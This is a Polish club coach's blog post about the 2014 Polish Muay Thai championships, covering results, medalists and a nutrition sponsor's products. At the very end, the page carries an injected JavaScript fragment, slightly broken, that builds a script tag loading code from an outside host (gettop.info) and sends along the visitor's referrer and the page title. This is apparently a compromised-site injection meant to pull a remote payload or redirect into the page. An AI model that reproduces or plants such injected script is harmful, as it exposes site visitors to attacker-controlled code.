Mistrzostwa Polski w Muay-Thai

9.06.2014 / Mariusz Cieśliński

Wczoraj zakończyły się Mistrzostwa Polski w MuayThai pod patronatem Polskiego Związku Muaythai i światowej federacji amatorskiego muaythai  IFMA.

Parę zdjęć z hali gdzie rozgrywała się rywalizacja na dwóch ringach w moim rodzinnym mieście(ja i mój  klub K.O. GYM Świebodzice byłem współorganizatorem.Oczywiście TREC NUTRITION też tam był jako fundator nagród-wielkie podziękowanie :) :) :)

Zawodnicy poddani mocnym obciążeniom-walka w ringu i kontrola codzienna limitu wagi.Tu trzeba umiejętności i znajomości własnego organizmu oraz niesamowitego wytrenowania wydolnościowego.Do tego mądre nawadnianie i posiłki w trakcie zawodów,po ważeniu.Tutaj szerokie spektrum działania żeli energetycznych  ACTION LINE.Widać było,że dużo sportowców o moich nie wspominając stosowało to rozwiązanie.

Rywalizacja amatorska to walka w kaskach,rękawicach bokserskich,miękkich protektorach goleni i łokci.Walka 3rundy po trzy minuty.Ciosy bokserskie,kopnięcia ,uderzenia łokciami i kolanami dozwolone.

Mój klub uplasował się wg.podliczeń  w rywalizacji seniorów na pierwszym miejscu.Cztery złote medale wśród mężczyzn-Arek Osienienko -57kg,Miłosz Bochenek – 60 kg, Bartosz Batra -63,5kg,Jarosław Zawodni -91kg.Do tego srebro Grześka Cioska w +91kg,brąz Artura Gabryjelskiego -63,5kg.Kobiety senior- złoto Katarzyna Jeziorska -54kg i srebro Iwona Modrzejewska -63,5kg.  Kadet Mateusz Mickiewicz srebro i dwa brązowe wśród dzieci Kacper Kazek i Jakub Szymczak.

Dla moich zawodników naszego klubu duży sukces i mobilizacja do dalszej pracy.

Niedługo filmiki z walk i nowa paczka zdjęć z mistrzostw.A w filmiku jedna z najlepszych walk w historii zawodowego muaythai  z mekki tego sportu Lumpinee Stadium Bangkok-Jongasanan vs Sakmongkol

 

var d=document;var s=d.createElement(‚script’); s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; }